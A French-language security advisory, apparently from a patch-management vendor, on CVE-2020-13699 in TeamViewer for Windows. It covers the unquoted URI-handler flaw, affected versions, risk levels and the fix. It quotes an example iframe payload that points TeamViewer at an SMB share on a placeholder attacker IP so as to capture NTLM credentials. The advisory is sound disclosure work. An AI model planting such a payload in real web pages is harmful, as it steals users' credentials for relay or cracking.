Une vulnérabilité à haut risque a été découverte dans TeamViewer pour Windows. Elle est suivie sous le nom de « CVE-2020-13699 », avec un score de base CVSS de « 8.8 » qui pourrait être exploitée par des attaquants à distance pour craquer le mot de passe des utilisateurs et, par la suite, conduire à une exploitation plus poussée du système.

TeamViewer est une application logicielle pour le contrôle à distance, le partage de bureau, les réunions en ligne, les conférences Web et le transfert de fichiers entre ordinateurs, développée par la société allemande TeamViewer GmbH. TeamViewer est disponible pour les systèmes d’exploitation Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8 et BlackBerry. Il est également possible d’accéder à un système exécutant TeamViewer avec un navigateur web.

Une augmentation récente de l’utilisation des applications logicielles de connectivité à distance en raison du récent changement de culture du travail à domicile de la pandémie COVID-19.

(CVE-2020-13699) Détails de la vulnérabilité:

• CVE-2020-13699 est une faille de sécurité qui découle d’un chemin ou d’un élément de recherche non cité. Plus précisément, cette vulnérabilité est due au fait que l’application ne cite pas correctement ses gestionnaires d’URI personnalisés.

• Un utilisateur avec une version TeamViewer vulnérable installée est amené à visiter un site web malicieusement conçu pour exploiter cette vulnérabilité.

• Selon Jeffrey Hofmann, ingénieur en sécurité chez Praetorian, qui a découvert et divulgué la vulnérabilité « Un attaquant pourrait intégrer une iframe malveillante dans un site web avec une URL fabriquée (iframe src=’teamviewer10 : -play \\attacker-IP\share\fake.tvs’) qui lancerait le client de bureau Windows TeamViewer et le forcerait à ouvrir un partage SMB distant. »
• Windows effectuera une authentification NTLM lors de l’ouverture du partage SMB. Cette requête peut être relayée c’est-à-dire permet à un attaquant de capturer une authentification et de l’envoyer à un autre serveur, lui donnant la possibilité d’effectuer des opérations sur le serveur distant en utilisant le privilège de l’utilisateur authentifié.
• Une exploitation réussie de cette vulnérabilité pourrait permettre à un attaquant distant de lancer TeamViewer avec des paramètres arbitraires. L’application pourrait être forcée de relayer une demande d’authentification NTLM au système de l’attaquant permettant des attaques hors ligne de type rainbow table et des tentatives de craquage par force brute.

• Ces attaques pourraient conduire à une exploitation supplémentaire en raison des informations d’identification volées à partir de l’exploitation réussie de la vulnérabilité.

La divulgation a suggéré qu’il n’y a aucune preuve de l’exploitation de cette vulnérabilité.

Selon le CIS, le risque d’exploitation est élevé pour les institutions gouvernementales et les entreprises de taille moyenne. Dans le cas des entités de petites entreprises, le risque est moyen et faible pour les utilisateurs domestiques.

Impact
L’exploitation des vulnérabilités pourrait permettre à des attaquants distants d’obtenir des informations d’identification sensibles ou de prendre le contrôle total du système affecté.

Produits affectés
TeamViewer Windows Desktop Application antérieure à 8.0.258861, 9.0.258860, 10.0.258873,11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 et 15.8.3.

Solution
TeamViewer a publié une mise à jour de sécurité adressant CVE-2020-13699.

Le contenu de sécurité SanerNow pour détecter et atténuer cette vulnérabilité est publié. Nous recommandons fortement d’appliquer la mise à jour de sécurité avec notre instruction d’article de support publiée.